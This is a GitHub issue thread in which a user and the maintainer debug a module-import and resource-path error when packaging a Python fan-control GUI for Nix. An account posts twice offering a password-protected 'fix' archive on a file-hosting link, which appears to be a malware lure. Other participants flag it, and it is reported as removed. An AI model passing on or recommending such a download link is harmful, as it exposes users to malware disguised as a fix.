### ISSUE TITLE
No module named src.app

### ISSUE THREAD

**Issue by Svenum** [leopoldhub/fw-fanctrl-gui#1]
Hi, 
I saw this project and would try it on nix, but if I execute it I got this error:

```bash
Traceback (most recent call last):
  File "/nix/store/42z1nvysrz95ccwjd4ss2jibf9ch3la7-python3.12-fw-fanctrl-gui-26-08-2024/bin/.fw-fanctrl-gui-wrapped", line 9, in <module>
    sys.exit(main())
             ^^^^^^
  File "/nix/store/42z1nvysrz95ccwjd4ss2jibf9ch3la7-python3.12-fw-fanctrl-gui-26-08-2024/lib/python3.12/site-packages/src/__main__.py", line 2, in main
    from .index import start
  File "/nix/store/42z1nvysrz95ccwjd4ss2jibf9ch3la7-python3.12-fw-fanctrl-gui-26-08-2024/lib/python3.12/site-packages/src/index.py", line 7, in <module>
    from src.app.MainWindow import main
ModuleNotFoundError: No module named 'src.app'
``` 

Have you any idea?

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Svenum** [comment]
Thats sus. I will not use your link. If you have a fix make PR or send it in a code block. I report you as I think thats to 99% maleware.

**Comment by leopoldhub** [comment]
Hi, 

The project is still in a very early stage, I am still trying to figure out the project structure and configurations.

The app cannot be executed as is, you need to install it with pip, then execute it with its name (fw-fanctrl-gui), or the command `python -m src`.

Could you also describe the steps you did to execute it?

**Comment by leopoldhub** [comment]
By the way, who was ChangjingZhang?
I saw the messages In my mails but I cannot see them on github and report him.

**Comment by Svenum** [comment]
He is already blocked and github removed the commends

**Comment by Svenum** [comment]
If I replace `packages=["src"]` with `packages=["src", "src.app", "src.service", "src.exception"]` in the setup.py it works.

But now I get

```shell
QIODevice::read (QFile, "resources/ui/main/main.ui"): device not open
Designer: An error has occurred while reading the UI file at line 1, column 0: Premature end of document.
Traceback (most recent call last):
  File "/nix/store/hps2jabva0rq38wm2g56bpa51zvwfqwz-python3.12-fw-fanctrl-gui-26-08-2024/bin/.fw-fanctrl-gui-wrapped", line 9, in <module>
    sys.exit(main())
             ^^^^^^
  File "/nix/store/hps2jabva0rq38wm2g56bpa51zvwfqwz-python3.12-fw-fanctrl-gui-26-08-2024/lib/python3.12/site-packages/src/__main__.py", line 4, in main
    start()
  File "/nix/store/hps2jabva0rq38wm2g56bpa51zvwfqwz-python3.12-fw-fanctrl-gui-26-08-2024/lib/python3.12/site-packages/src/index.py", line 30, in start
    window = main(args, app, fanctrlService)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/nix/store/hps2jabva0rq38wm2g56bpa51zvwfqwz-python3.12-fw-fanctrl-gui-26-08-2024/lib/python3.12/site-packages/src/app/MainWindow.py", line 170, in main
    window = MainWindow(icon, fanctrlService)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/nix/store/hps2jabva0rq38wm2g56bpa51zvwfqwz-python3.12-fw-fanctrl-gui-26-08-2024/lib/python3.12/site-packages/src/app/MainWindow.py", line 16, in __init__
    self.ui = QtUiTools.QUiLoader().load("resources/ui/main/main.ui")
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
RuntimeError: Unable to open/read ui device
```

I think its because the `resources` folder is not imported.

**Comment by Svenum** [comment]
If I execute the build in the folder where the `resources` folder is present it works.

**Comment by leopoldhub** [comment]
Thanks, maybe I missed something... I will check that later on, I do not have much time these days 😅

I am also thinking of using PyInstaller to make a one click install without worring about Python version and virtualenv.

**Comment by Svenum** [comment]
Nice. If the nix build work I would love too add the gui as experimental feature to the fw-fanctrl nix flake. Would this ne bine for you?

**Comment by leopoldhub** [comment]
I appreciate the intention, but

1. We should not make a direct link from `fw-fanctrl` to this project without @TamtamHero 's approval.
2. I think it is important to have the project structure ready and conventions defined before actually distributing it, so that we avoid breaking people's configs in future changes.

I will try to have it working properly on all platforms by Tuesday if you want to try it.

**Comment by TamtamHero** [comment]
Approval granted! Nice job :)

**Comment by leopoldhub** [comment]
Thanks a lot, 

This is a project I can work on without my main pc at hand during this one-month absence, I will do my best to work on it when I find some time :)

It is also an opportunity to work with the standard pip installation (as described in https://github.com/TamtamHero/fw-fanctrl/issues/73) and get it right before implementing it in the core project.

Have a nice day!

**Comment by leopoldhub** [comment]
(ps. I may not be available during normal hours due to time zones and working hours, If you contact me, I will answer as soon as I can)

**Comment by Svenum** [comment]
Some news on this front?

**Comment by leopoldhub** [comment]
Hi @Svenum , how are you doing?
Didn't had quite the time those last few months, I plan to rework a part of the project structure soon.

**Comment by Svenum** [comment]
I am doing good. That sound great. I really looking into this project.

**Comment by Svenum** [comment]
Ah, I love to see, that you are working on this project again. Please tell me if the Project has a state, where I can build a nix package and test it on my device. 😄👍

**Comment by leopoldhub** [comment]
Yes, I found some time to work on personal projects 😄.

My goal is to finish the system tray and background startup as soon as possible so that it has a minimal working state.

Before marking it "ready for packaging", we will have to wait for https://github.com/TamtamHero/fw-fanctrl/pull/102 to be merged, as this project depends on its features.

After that, I will start working on the configuration part (default strategy, adding/removing strategies, configuring/visualizing them...).

Also, feel free to contribute if you want to ^^

**Comment by leopoldhub** [comment]
> No module named src.app

should be good now 😅

**Comment by Svenum** [comment]
Works!
